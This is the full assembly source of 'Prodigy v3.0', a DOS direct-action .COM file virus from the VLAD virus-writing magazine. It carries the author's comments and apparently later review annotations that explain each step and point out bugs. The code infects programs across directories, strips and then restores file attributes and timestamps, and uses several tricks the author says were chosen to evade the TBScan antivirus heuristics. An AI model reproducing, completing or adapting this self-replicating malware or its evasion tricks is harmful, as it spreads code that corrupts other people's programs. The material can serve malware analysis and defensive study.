
VLAD Magazine - Issue #2 - ARTICLE.4_5 - Prodigy 3 Virus Source Code

  1. ; - [Prodigy] v3.0
  2. ;   Metabolis/VLAD
  3. ;                                _   _  .---------.
  4. ;                               | | |_| |  T H E  |
  5. ;                               | |  _  `---------'
  6. ;    _____   _____   _____   ___| | | |  ______  _   _
  7. ;   |  _  | | .-. | |  _  | |  _  | | | |  ___/ | | | |
  8. ;   | |_| | | `-' | | |_| | | |_| | | | | |___  | | | |
  9. ;   |  ___| |_|~\_\ |_____| |_____| |_|  \_,. | |_|_|_|
  10. ;   | |     .---------------------.         | |   | |
  11. ;   | |     |  -  VIRUS! v3.0  -  |         | |   | |
  12. ;   |_|     `---------------------'         |_|   |_|
  13. ;
  14. ; - Direct Action, Parasitic .COM infector
  15. ; - Restores original attributes and file date/time
  16. ; - Searches '..' until there are no more files to infect
  17. ; - Won't infect COMMAND.COM (the check only compares the first two name characters with "CO", so every other *.COM whose name starts with CO is skipped too)
  18. ; - Has an infection counter (set to infect 2 at a time right now)
  19. ;
  20. ; - sure, this virus is simple, and not really worth releasing.. but
  21. ;   not everyone is up to understanding Qark's level of code,
  22. ;   certainly not me.  So for the people who are just starting off
  23. ;   take a look at this one.  It's the 3rd virus I've written, the
  24. ;   other 2 definitely not worth publishing :) hehe
  25. ;
  26. ; - Use a86 to compile.  NOTE(review): this is a live DOS .COM infector; assemble and run it only inside an isolated emulator/VM with no shared or mapped drives.
  27.  
  28.         org     0100h                           ; .COM image: loaded at CS:0100h with
  29.                                                 ; CS=DS=ES=SS=PSP; all data is [bp+label]
  30.  
  31.         db 0e9h,00h,00h                         ; 'jmp begin' (E9, rel16=0) -- only the
              ; first-generation carrier starts this way; an infected host starts with the
              ; patched copy kept in 'infjump' (see the data area)
  32.  
  33. begin:
              ; ---- virus body starts here (heap-begin bytes of it are appended to hosts) ----
              ; Delta offset: the body is assembled as if it sat at 'begin', but in a host it
              ; runs from wherever it was appended, so bp = (runtime - assembled) and every
              ; data reference below is written [bp+label].
  34.         call    $+3                             ; pushes the address of 'next' (call is 3 bytes)
  35. next:   int     3h                              ; 1-byte filler; author: dodges TBScan's 'E'
              ; flag.  NOTE(review): this is a breakpoint trap -- presumably an IRET under plain
              ; DOS, but it fires on every run when the sample is traced under a debugger.
  36.         pop     bp                              ; bp = runtime offset of 'next'
  37.         sub     bp, offset next                 ; bp = delta (0 when the carrier itself runs)
  38.  
  39. set_dta:
  40.  
              ; Restore the host's original first three bytes (saved in 'first3' when it was
              ; infected) over the entry jump at 100h, so the final 'jmp 100h' runs the host
              ; unchanged.  In the carrier first3 is 'int 20h',00 -> the carrier just exits.
              ; No cld: relies on DF already being clear at entry.
  41.         lea     si, [bp+offset first3]
  42.         mov     di, 100h
  43.         movsw
  44.         movsb
  45.  
  46.         ; (3 bytes: movsw + movsb; ds:si -> first3, es:di -> 100h, DS=ES for a .COM)
  47.         ; Nothing else touches 100h..102h afterwards, so the host sees its own
  48.         ; bytes when control is handed back at load_com.
  49.  
  50.         mov     byte ptr [bp+counter], 00h      ; counter lives past 'heap' and is never
  51.                                                 ; written to disk, so zero it at run time
  52.         mov     ah,47h                          ; DOS 47h: get current directory of
  53.         xor     dl,dl                           ; drive dl (0 = default) into ds:si as
  54.         lea     si,[bp+offset currdir]          ; ASCIIZ *without* a leading '\';
  55.         int     21h                             ; 'slash' just before currdir supplies it
  56.  
  57.         mov     ah,1Ah                          ; DOS 1Ah: move the DTA to tempDTA so
  58.         lea     dx,[bp+offset tempDTA]          ; FindFirst/FindNext do not overwrite the
  59.         int     21h                             ; PSP command tail at 80h
  60.  
  61. find_first:
  62.  
  63.         mov     ah,4eh                          ; DOS 4Eh: FindFirst into the DTA
  64.         mov     cx,7                            ; cx=7: also match R/O|hidden|system
  65.         dec     byte ptr [bp+offset mask]       ; files ('+' 2Bh -> '*' 2Ah)
  66.  
  67.         ; the mask is stored as '+.COM' and only turned into '*.COM' for the
  68.         ; duration of the call, so the literal '*.COM' never appears in the
  69.         ; bytes written to disk (author: avoids a scanner heuristic).
  70.  
  71.         lea     dx,[bp+offset mask]             ; ds:dx -> '*.COM'
  72.         int     21h
  73.         inc     byte ptr [bp+offset mask]       ; back to '+.COM' before any write
  74.  
  75.         ; (the body written in 'infect' is copied straight from memory, so the
  76.         ; mask must be restored before that happens)
  77.  
  78.         jnc     open_file                       ; CF clear: a candidate was found
  79.         jmp     load_com                        ; nothing here: counts as a pass, move on
  80.  
  81. fn:
  82.         jmp     find_next                       ; trampoline: find_next is beyond short-jump
  83.                                                 ; range (-128..+127) for most je/jc below.
              ; NOTE(review): every 'fn' exit lands in find_next, which calls close_file
              ; whether or not a file is currently open (see find_next).
  84.  
  85.  
  86.  
  87. open_file:
  88.  
  89.         ; The DTA now holds the search record for the found file.  Offsets used
  90.         ; in this source (from the start of the DTA):
  91.         ;   +15h attribute byte      +16h time (word)      +18h date (word)
  92.         ;   +1Eh ASCIIZ file name
  93.         ; The default DTA is at PSP:80h, but this code moved it to tempDTA, so all
  94.         ; accesses go through [bp+tempDTA+off].  FindNext (4Fh) continues the search
  95.         ; from the state kept in the same record.
  96.  
  97.         cmp     word ptr [bp+tempDTA+1eh],'OC'  ; name starts with "CO" ('OC' as a little-
  98.         je      fn                              ; endian word)? skips COMMAND.COM -- and
              ; every other *.COM whose name begins with CO (COMP.COM, CONVERT.COM, ...)
  99.         lea     dx,[bp+tempDTA+1eh]             ; ds:dx -> file name in the DTA
  100.        mov     ax,4301h                        ; DOS 4301h: set attributes = 20h (archive
  101.        mov     cx,20h                          ; only) so R/O, hidden, system files can be
  102.        int     21h                             ; opened for write; close_file restores them
  103.        jc      fn                              ; could not change attributes: skip it
  104.        mov     ax,3D02h                        ; DOS 3D02h: open read/write
  105.        lea     dx,[bp+tempDTA+1eh]             ; ds:dx -> file name in the DTA
  106.        int     21h
  107.        jc      fn                              ; open failed: skip it
  108.        xchg    bx,ax                           ; bx = handle (1-byte form of mov bx,ax)
  109.  
  110. infect:
  111.        mov     cx,3                            ; DOS 3Fh: read the host's first 3 bytes
  112.        mov     ah,03Fh                         ; into first3 (needed for the checks below
  113.        lea     dx,[bp+offset first3]           ; and to restore them at run time)
  114.        int     021h
              ; NOTE(review): neither CF nor the byte count in ax is checked; a host
              ; shorter than 3 bytes leaves stale data in first3 and is still infected.
  115.  
  116.        lea     cx,word ptr [bp+offset first3]  ; BUG: lea loads the ADDRESS of first3
  117.                                                ; into cx, not its first two bytes (mov
              ; was meant).  cl+ch below is therefore a sum of address bytes that changes
              ; with the host's length, and the 'MZ' test never looks at the file contents:
              ; an .EXE renamed to .COM is not rejected and gets its MZ header overwritten,
              ; while a genuine .COM is skipped whenever those address bytes happen to sum
              ; to 167.
  118.        add     cl,ch                           ; (intended) low + high byte of "MZ"
  119.        cmp     cl,167                          ; 'M'(77)+'Z'(90) = 167
  120.        je      fn                              ; looks like an EXE: skip it (file is
                                                      ; open; find_next's close_file closes it)
  121.  
  122.        ; author's note: comparing the first word with 'MZ'/'ZM' directly sets off a
  123.        ; tbscan heuristic, hence the adding trick.  'N'+'Y' also gives 167 but is
  124.        ; not worth worrying about; the author had not yet seen the first two bytes
  125.        ; of a COM file add up to 167.  (With the lea bug above the sum is not of
  126.        ; file bytes at all, so neither remark applies in practice.)
  127.  
  128.        call    lseek_end                       ; ax = low word of file size (dx ignored:
                                                      ; assumes the host fits in a 64K .COM --
                                                      ; no size check anywhere, so a host near
                                                      ; 64K becomes unloadable after infection)
  129.  
  130.        sub     ax,heap-begin+3                 ; ax = size - (virus length + 3) = the rel16
  131.        cmp     word ptr [bp+first3+1],ax       ; an infected host's entry jmp would carry
  132.        je      fn                              ; (target 103h+rel16 = 100h+original size):
              ; equal -> already infected, skip.  Only the 2-byte displacement is compared,
              ; not the E9 opcode, so a clean host whose bytes 1-2 happen to match is skipped.
  133.        add     ax,heap-begin                   ; ax = size - 3 = rel16 of the NEW entry
  134.        mov     word ptr [bp+infjump+1],ax      ; jmp (to 100h+size, where the body is
                                                      ; about to be appended); patch it in
  135.  
  136.        mov     ax,4200h                        ; DOS 4200h: seek to cx:dx = 0 from start
  137.        cwd                                     ; dx = 0 (ax is positive, so cwd == xor dx,dx)
  138.        xor     cx,cx
  139.        int     21h
  140.  
  141.        mov     cx,3                            ; DOS 40h: overwrite the host's first 3
  142.        mov     ah,40h                          ; bytes with the patched 'jmp' in infjump
  143.        lea     dx,[bp+offset infjump]
  144.        int     21h
  145.  
  146.        call    lseek_end                       ; seek to end of file again
  147.  
  148.        mov     cx,heap-begin                   ; DOS 40h: append the body, begin..heap
  149.        mov     ah,40h                          ; (infjump, first3, mask etc. go with it;
  150.        lea     dx,[bp+offset begin]            ; currdir/counter/tempdta past 'heap' do not)
  151.        int     21h
              ; NOTE(review): neither write is checked (no jc / no compare of ax with cx).
              ; If the first write succeeds and this one fails or is short (disk full), the
              ; host's entry jmp now points past the end of the file.
  152.  
  153.        call    close_file                      ; restore attributes + date/time, close
  154.  
  155. load_com:
  156.  
  157.        inc     byte ptr [bp+counter]           ; counts arrivals here: successful
  158.        cmp     byte ptr [bp+counter],2         ; infections AND dead ends (empty
  159.        jne     find_next                       ; directory, chdir '..' failing at the
                                                      ; root); stop after the 2nd
  160.  
  161.        mov     ah, 1Ah                         ; DOS 1Ah: DTA back to PSP:80h
  162.        mov     dx, 80h                         ; (ds = PSP for a .COM)
  163.        int     21h
  164.  
  165.        mov     ah,3bh                          ; DOS 3Bh: chdir to '\'+currdir -- undo
  166.        lea     dx,[bp+offset slash]            ; the '..' walk done in dot_dot
  167.        int     21h                             ; (result not checked)
  168.  
  169.        mov     bx,101h                         ; jmp 100h -> run the restored host.
  170.        dec     bx                              ; mov/dec split so no literal 'jmp 100h'
  171.        jmp     bx                              ; pattern exists (tbscan heuristic).
              ; NOTE(review): ax/bx/cx/dx/si/di/bp are NOT restored to their load-time
              ; values, so a host that depends on DOS's initial register contents sees
              ; whatever this code left behind.
  172.  
  173. find_next:
  174.  
  175.        call    close_file                      ; NOTE(review): reached from every 'fn'
                                                      ; exit and from load_com too, i.e. also
                                                      ; when no file is open.  close_file then
                                                      ; works on a stale bx and on whatever
                                                      ; tempDTA holds -- if bx still holds 0
                                                      ; from program start, DOS 3Eh closes the
                                                      ; process's STDIN handle.
  176.  
  177.        mov     ah,4fh                          ; DOS 4Fh: FindNext (state is in tempDTA)
  178.        int     21h
  179.        jc      dot_dot                         ; no more *.COM here: go up one level
  180.        jmp     open_file                       ; candidate found
  181.  
  182. dot_dot:
  183.  
  184.        mov     ah,3bh                          ; DOS 3Bh: chdir '..' (the cwd is put
  185.        lea     dx,[bp+offset dds]              ; back from currdir before the host runs)
  186.        int     21h
  187.        jc      load_com                        ; already at the root: count it and
  188.        jmp     find_first                      ; finish; otherwise search this directory
  190. close_file:
               ; Put the file back the way FindFirst saw it, then close it.
               ;   in:  bx = handle, tempDTA = search record of this file
               ;   clobbers ax, cx, dx, flags; no DOS error is checked
  192.         xor     cx,cx
  193.         mov     cl,byte ptr [bp+tempdta+15h]    ; cx = original attribute byte (DTA+15h)
  194.         lea     dx,[bp+TempDTA+1eh]             ; ds:dx -> ASCIIZ name (DTA+1Eh)
  195.         mov     ax,4301h                        ; DOS 4301h: set attributes back (undoes
  196.         int     21h                             ; the 20h forced in open_file)
  197.         mov     cx,word ptr [bp+tempDTA+16h]    ; cx = original time (DTA+16h)
  198.         mov     dx,word ptr [bp+tempDTA+18h]    ; dx = original date (DTA+18h)
  199.         mov     ax,5701h                        ; DOS 5701h: set handle date/time, so the
  200.         int     21h                             ; stamp written at close is the old one
  201.         mov     ah,3eh                          ; DOS 3Eh: close handle bx (with a stale
  202.         int     21h                             ; bx this just fails, or closes an
  203.         ret                                     ; unrelated handle -- see find_next)
  204.  
  205. lseek_end:
              ; Seek to end of file.  in: bx = handle.  out: dx:ax = file size
              ; (callers use ax only).  Clobbers ax, cx, dx, flags; CF is not checked.
  206.        mov     ax,4202h                        ; DOS 4202h: seek cx:dx = 0 from end
  207.        cwd                                     ; dx = 0 (ax is positive, so == xor dx,dx)
  208.        xor     cx,cx
  209.        int     21h
  210.        ret
  211.  
  212. quote   db      0dh,0ah                         ; text payload: never referenced by the
  213.         db      '[Prodigy] v3.0 by Metabolis/VLAD',0dh,0ah   ; code, but it sits before
  214.         db      '"Feel the jungle vibe baby"',0dh,0ah        ; 'heap', so it is written
  215.         db      '"In the jungle, In the jungle.."',0dh,0ah   ; into every host (a usable
  216.                                                              ; detection string)
  217.         ; [Prodigy] v3.0 by Metabolis/VLAD
  218.         ; "Feel the jungle vibe baby"
  219.         ; "In the jungle, In the jungle.."
  220.  
  221.         ; Quote from "Ruff in the jungle bizness" by the Prodigy :)
  222.  
  223. infjump db      0e9h,00h,00h                    ; 'jmp rel16' written to host offset 0;
                                                      ; bytes 1-2 are patched in 'infect'
  224. first3  db      0cdh,20h,00h                    ; the host's original 3 bytes (read in
  225.                                                 ; 'infect', restored to 100h at run time).
                                                      ; Initial value 'int 20h',00: running the
                                                      ; carrier on its own just terminates.
  226. dds     db      '..',00                         ; chdir target for walking up (dot_dot)
  227. mask    db      '+','.COM',00                   ; search mask stored as '+.COM'; dec'd to
                                                      ; '*.COM' only around the FindFirst call
  228. slash   db      '\'                             ; deliberately NOT NUL-terminated: runs
  229.                                                 ; straight into currdir below
  230.         ; DOS 47h returns the current directory without its leading backslash,
  231.         ; and chdir (3Bh) to that relative copy does not work, so load_com passes
  232.         ; 'slash' instead: DOS then sees '\' + currdir as one ASCIIZ path.
  233.         ; 'slash' therefore has to stay the last byte before 'heap', and currdir
  234.         ; the first one after it.
  235.  
  236. heap:
              ; ---- end of the bytes written to a host: body length = heap-begin ----
              ; Everything below exists only in memory after the loaded image (a .COM
              ; is normally given its whole 64K segment); it is never written to disk.
  237.  
  238. currdir db      64 dup (?)                      ; DOS 47h target (64-byte buffer incl. NUL)
  239. counter db      00                              ; pass counter, zeroed at 'set_dta'
  240. tempdta db      43 dup (?)                      ; FindFirst/FindNext record (43 bytes):
                                                      ; +15h attr, +16h time, +18h date, +1Eh name
  241.  
  242.         ; everything after heap doesn't actually get written to disk when
  243.         ; the virus infects a file.
  244.  